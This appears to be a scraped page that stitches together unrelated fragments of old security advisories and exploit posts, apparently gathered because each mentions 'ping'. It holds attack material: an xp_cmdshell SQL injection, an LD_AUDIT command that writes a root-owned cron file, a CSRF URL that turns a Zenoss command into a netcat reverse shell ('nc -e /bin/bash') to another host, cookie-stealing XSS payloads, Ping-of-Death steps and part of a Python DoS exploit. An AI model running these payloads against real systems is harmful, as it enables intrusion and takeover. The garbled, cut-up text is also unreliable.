| New User, Welcome! Login |
Next Page >>
Echo Request
As expected, the following request will be identified and blocked
(depending
of configuration) by the IBM Web application firewall.
http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC
master..xp_cmdshell "ping 10.1.1.3" --
IIS with ASP.NET (and even pure ASP) technology will concatenate the
contents
of a parameter if multiple entries are part of the request.
Workaround Bypass:
==================
Craft the packets in a way so that the first fragment has an ICMPv6 echo
request and the second fragment overwrites the first fragment with the
ICMPv6 router advertisement.
Fragment 1:
IPv6 Header
Fragmentation Header
CVE-2008-0530 leavingcisco.com and Cisco Bug IDs CSCsj74818 and
CSCsk21863.
SCCP-Only Related Vulnerabilities
* Large ICMP Echo Request DoS
Cisco Unified IP Phone 7940, 7940G, 7960 and 7960G devices
running SCCP firmware contain a DoS vulnerability. It is possible
to cause a vulnerable device to reboot by sending a large ICMP
echo request packet. This vulnerability is corrected in SCCP
More Details
============
The OmniPCX web interface has a CGI script "masterCGI" which offers a
"ping" functionality. By running the script with the parameters "ping"
and "user", one is able to ping any IP address reachable from the server
the webinterface is running on.
curl -k "https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=127.0.0.1"
-rw-r--r-- 1 root root 5496 2010-10-12 03:32 /lib/libpcprofile.so
# We identified one of the pcprofile constructors is unsafe to run with
# elevated privileges, as it creates the file specified in the output
# environment variable.
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
208.67.219.0/24; # change.
reject_policy = fail; # If you do not provide any alternative server
# sections, like the following root-server
# example, "negate" may be more appropriate here.
timeout = 4;
uptest = ping; # Test availability using ICMP echo requests.
ping_timeout = 100; # ping test will time out after 10 seconds.
interval = 15m; # Test every 15 minutes.
preset = off;
}
*/
Using a simple ping command in the password field an attacker could use timing
attacks to verify the presence of the vulnerability:
| ping -c 10 <<HOST>>
The ping command above will attempt to send 10 ICMP echo requests to the
target host, resulting in a noticable delay easily detected by vulnerability
scanners.
Versions Affected
-----------------
These vulnerabilities are documented in the following Cisco bug IDs:
* Cisco bug ID CSCsi13344 - XSS in IOS HTTP Server
Special Characters are not escaped in URL strings sent to the
HTTP server.
* Cisco bug ID CSCsr72301 - XSS in IOS HTTP Server (ping parameter)
Special Characters are not escaped in URL strings sent to the
HTTP server, via the ping parameter. The ping parameter is used
both by external applications such as Router and Security Device
Manager (SDM) as well as a direct HTTP session to Cisco IOS http
server. This vulnerability affects 12.1E based trains and all
[DCA-0001]
[Dlink Di-604 router authenticated user ping tool Xss and DoS]
[vendor product description]
The DI-604 combines the latest advancements in chip technology,
low-cost design and manufacturing with new, feature-rich firewall and
network management controls to give you quite possibly the most
advanced, yet affordable Ethernet router to date.
Nortel IP phone DoS
Discovered: 2008-02-25
Tested on firmware: 0604DAS (Latest firmwares have also been tested.)
Welcome the return of the Ping of Death!
wait a minute...isn't this 2008?
Steps to reproduce:
1. ping -s 65500 < ip of the phone >
WAS Samples:
2. PlantsByWebSphere Sample multiple XSS vulnerabilities.
3. JAX-WS Web Services MTOM Sample XSS vulnerability.
4. JAX-WS Web Services Ping and Echo Sample multiple XSS vulnerabilities.
5. Dynamic Query - Employee Finder Sample multiple XSS vulnerabilities.
6. Dynamic Query - EJB Data Mediator Service Sample XSS vulnerability.
7. Application Profile - Account Management Sample multiple XSS vulnerabilities.
8. Scheduler Account Report Sample multiple XSS vulnerabilities.
executed it? ZoneAlarm would be disarmed, leaving you exposed and
unprotected.
Preliminaries
Firstly setup a continuous ping or similar to the system being tested, so as
to verify that ZoneAlarm is working and blocking these.
Step-by-step illustration
There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.
The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like "ping" or "su".
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.
Example exploiting session
I. ABOUT THE APPLICATION
________________________
MyCart is a collection of PHP scripts that setup the
backbone of a shopping cart or on-line ordering system.
II. DESCRIPTION
_______________
by or originated from the device. Transit traffic will not trigger this
vulnerability.
Both connections to and from the router could trigger this
vulnerability. An example of a connection to the router is that you may
still be able to ping the device, but fail to establish a TELNET or SSH
connection to the device. For example, an administrator may still be
able to ping the device but fail to establish a Telnet or SSH connection
to the device. Administrators who attempt a Telnet or a SSH connection
to a remote device from the CLI prompt will encounter a hung session
and the "Trying <ip address|hostname> ..." prompt. The connection
defaultAdminRole=ZenUser&defaultPageSize:int=40&email=&eventConsoleRefresh:
boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=&
password=letmein&sndpassword=letmein&zenScreenName=editUserSettings
2. Change and execute a command CSRF.
Change the ping command to be a netcat shell out to a remote system. In
this case an internal system running on port 443
http://172.16.28.5:8080/zport/dmd/userCommands/ping?command:text=nc -e
/bin/bash 172.16.28.6 443&commandId=ping&description:text=&
manage_editUserCommand:method=Save&zenScreenName=userCommandDetail
* 05/01/2010: Vendor asks for more details including a complete bug analysis
and patches.
* 06/01/2010: Provide full analysis and patches to the vendor.
* 06/01/2010: Vendor claims to have silently patched the vulnerability in
their development branch.
* 01/03/2010: Ping vendor, who remains silent...
* 22/03/2010: Ping vendor, who remains silent...
* 20/07/2010: Inform the CERT about the vulnearbility.
* 20/07/2010: Recontact CERT about this vulnerability.
* 03/08/2010: CERT gets back to us asking for details.
* 09/08/2010: Send available information to the CERT.
SUMMARY
WowWee Rovio - Insufficient Access Controls - Covert Audio/Video
Snooping Possible
OVERVIEW
Rovio from WowWee does not adequately secure all accessible URLs or media
streams, enabling an unauthorized user with network access to the robotic
webcam platform the ability to listen to and view audio/video streamed from
* userfilter parameter of pvm_user_management.php resource.
url_placeholder/pvm_user_management.php?userfilter=1%22+onblur%3D%22alert%28%27xss%27%29
* ping parameter of sys_tools.php
url_placeholder/sys_tools.php?form=ping&page=sys_ping.php&ping=<script>alert(document.cookie)</script>
* action parameter of pvm_cert_commaction.php resource
- 13 - 06 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ ping - my dearest wife, zautha my little warrior "happy birthday, dear"
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
===========
Multiple vulnerabilities have been reported in Nagios:
* Paul reported that statuswml.cgi does not properly sanitize shell
metacharacters in the (1) ping and (2) traceroute parameters
(CVE-2009-2288).
* Nagios does not properly verify whether an authenticated user is
authorized to run certain commands (CVE-2008-5027).
- 7 - 08 - 2007 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~
~ ping - my dearest wife, zautha my little son, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for the best comments)
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
- 05 - 05 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ ping - my dearest wife, zautha my light of eyes, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, az01,negative,the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,super_temon,b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy, ketut, rizal, cR4SH3R, kuntua, stev_manado, nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
- 05 - 05 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ ping - my dearest wife, zautha my light of eyes, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, az01,negative,the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,super_temon,b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy, ketut, rizal, cR4SH3R, kuntua, stev_manado, nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
- 30 - 05 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~
~ ping - my dearest wife, zautha my little angel, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az01,negative,the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,super_temon,b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,kuntua,stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
- 14 - 07 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ ping - my dearest wife "happy birthday darling", zautha - my beloved son
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
---------------------------------------------------------------------------
Shoutz:
~~~~
~ "Happy 5th Anniversary" for ECHO.
~ ping - my dearest wife, zautha - my beloved son, and my beloved next children.
~ "Happy Wedding" for (y3dips,the_day,Negatif),moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ SK,pokleyzz,Abond,an0maly,cybertank, super_temon, b120t0,inggar,fachri,adi,rahmat,indra
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b
- 24 - 06 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~
~ ping - my dearest wife, zautha - my little warrior
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
check(ip)
return suck
def check(ip):
print "[+] No HTTP response..."
print "[+] Server and network should go down!"
print "[+] Check it with ping..."
os.system("ping "+ip)
i=0
print "[!] Neostrada Livebox Remote Network Down Exploit!!"
print "[!] [HTTP DoS vuln] "
print "[!] by 0in [0in.email(at)gmail.com] "
- 05 - 05 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ ping - my dearest wife, zautha my light of eyes, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, az01,negative,the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,super_temon,b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy, ketut, rizal, cR4SH3R, kuntua, stev_manado, nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
Next Page>>
|
|
|
